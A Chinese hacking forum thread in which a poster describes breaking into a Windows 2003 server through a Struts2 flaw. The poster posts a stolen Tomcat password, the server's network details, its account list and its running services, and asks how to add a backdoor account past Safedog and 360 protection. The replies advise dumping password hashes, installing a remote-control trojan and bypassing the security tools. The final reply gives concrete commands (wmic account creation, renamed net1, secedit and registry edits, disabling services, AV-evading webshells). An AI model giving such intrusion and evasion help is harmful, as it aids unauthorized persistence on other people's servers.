win2003不能创建账户，求解

扯淡的青春

本人小白一个， St2漏洞拿下的，只支持jsp脚本，服务器明明有iis apache mssql i等服务的，就是不解析

搞到Tomact6的账户密码，
<tomcat-users>
<user name="tomcat_admin" password="iamtheking145" roles="manager-gui" />
管理界面被管理员不知高哪去了

上大马就被杀，把主动防御和360进程杀掉，安全狗的服务不管怎样都杀不了

添加不了帐户，总是失败。求解、、、、、

Connection-specific DNS Suffix  . :   

IP Address. . . . . . . . . . . . : xxx.186.23.49   
Subnet Mask . . . . . . . . . . . : 255.255.255.224   
IP Address. . . . . . . . . . . . : xxx.0.0.49   
Subnet Mask . . . . . . . . . . . : 255.0.0.0  
IP Address. . . . . . . . . . . . : xxx.49.40.140   
Subnet Mask . . . . . . . . . . . : 255.255.255.192   
Default Gateway . . . . . . . . . : xxx.49.40.129
-------------------------------------------------------------------------------

net1bak user
\\ 的用户帐户

-------------------------------------------------------------------------------
ASPNET                   backup                   ftpserver               
Guest                    IUSR_S145                IWAM_S145               
SQLDebugger              superadmin               SUPPORT_388945a0  


------------------------------------------------------------------------------

已经启动以下 Windows 服务:

   Apache Tomcat 6.0 Tomcat6
   Application Management
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Transaction Coordinator
   DNS Client
   Event Log
   HID Input Service
   HTTP SSL
   IIS Admin Service
   Intel(R) PROSet Monitoring Service
   IPSEC Services
   Java Quick Starter
   Logical Disk Manager
   McAfee Framework Service
   McAfee McShield
   McAfee Task Manager
   Microsoft Search
   MSSQLSERVER
   MySQL
   Network Connections
   Network Location Awareness (NLA)
   NT LM Security Support Provider
   Plug and Play
   Protected Storage
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   Safedog Guard Center
   Safedog Update Center
   Security Accounts Manager
   Serv-U FTP 服务器
   Shell Hardware Detection
   SQLSERVERAGENT
   System Event Notification
   Task Scheduler
   Telephony
   Terminal Services
   Windows Management Instrumentation
   Windows Time
   World Wide Web Publishing Service
   主动防御

--------------------------------------------------------------------------

longkubing

JSP.。是system权限么，能不能上神器读哈希。读密码

神仙

楼上正解

90_

都system了你干什么不行。。。上个马，控制屏幕就是了

m0ox

话不是这么说的   你可以看下   服务器上面开启了 主动防御  可能是360  你可以选择绕过   net   不行 就 net1  user   你可懂 ？

扯淡的青春

longkubing 发表于 2013-11-27 23:00
JSP.。是system权限么，能不能上神器读哈希。读密码

上传不了

Antergone

直接上个远控就好了啊。。 其他的都是浮云。。

热心网友7

看起来安全狗（Safedog）的防护很全面，管理员可能还启用了账户策略或组策略限制创建账户。建议先确认一下： 1. 检查安全狗是否限制了net user命令，可以试试用`net user username password /add`的变体，比如加上`/domain`参数（本地账户不用），或者用`net1.exe`代替`net.exe`（你列出的是net1bak，可能被改名了）。 2. 尝试通过wmic来创建：`wmic useraccount create name='newuser',password='pass'`。 3. 看看系统本地安全策略里是不是有“拒绝本地登录”或限制了创建账户的权限，可以尝试用`secedit`或修改注册表。 4. 如果安全狗服务杀不掉，考虑提权后直接卸载或禁用服务（不过要小心）。 5. jsp环境的话，有些马可以绕过查杀，换个免杀方式或加密一下试试。 另外留意下你列出的用户里有`superadmin`，这个可能是管理员自己建的，权限比较高，如果能拿到它的密码或者令牌，效果可能更好。